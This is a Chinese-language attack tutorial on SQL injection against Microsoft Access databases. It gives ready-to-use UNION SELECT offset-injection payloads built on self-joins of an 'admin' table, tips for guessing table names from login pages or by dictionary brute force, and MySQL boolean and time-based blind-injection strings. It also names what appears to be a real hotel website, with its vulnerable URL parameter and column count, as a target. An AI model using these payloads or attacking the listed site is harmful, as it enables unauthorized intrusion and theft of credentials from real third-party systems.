access数据库简介
access 关系型数据库,同时 也是文件型数据库,不需要端口号。
结构上与其他关系型数据库不同,只有表名、列名、字段名, 没有数据库名, 自己网站自己管,数据库*.mdb直接在自己网站目录下面,同时它也没有一些相关函数,如文件读写等,目前用的已经不多了。
注入偏移步骤
判断列数=》22
联合查询
逐个向前迁移判断表中字段数=》22-16=6
爆破字段内容:
一级偏移注入22-6×2=10
UNION SELECT 1,2,3,4,5,6,7,8,9,10,*from (admin as a inner join admin as b on a.id = b.id)
二级偏移注入10-6=4
UNION SELECT 1,2,3,4,a.id,b.id,c.id,*from ((admin as a inner join admin as b on a.id = b.id)inner join admin as c on a.id=c.id)
查看源码
有的可能还需要三级偏移注入
a.id,b.id,c.id,c.id,*from (((admin as a inner join admin as b on a.id = b.id)inner join admin as c on a.id=c.id)inner join admin as d on a.id=d.id)
表名猜解思路
表名猜解的话可以通过扫后台登陆url,url中的路径名可能就是表名
还有就是登陆框源码,其中的用户名密码变量名也有可能就是表名
如果还是不行,那只能通过字典爆破了
access数据库注入漏洞实例站点
http://www.ronghuhotel.com/Newsview.asp?id=23
order 16 字段5 需二级偏移注入
mysql与sql server数据库可操作内容对比
每个数据库的操作内容都不相同,同时权限不同,可执行的内容也不同,如下是mysql与mssql数据库操作内容对比:
mysql数据库,root是最高权限
sql server里面,sysadmin是最高权限
手工猜解思路
?id=-1 and length(database())=2
?id=2’ and substr(database(),1,1)=’s’–+
盲注
?id=1’ and if(length(database())=1,sleep(5),1)–+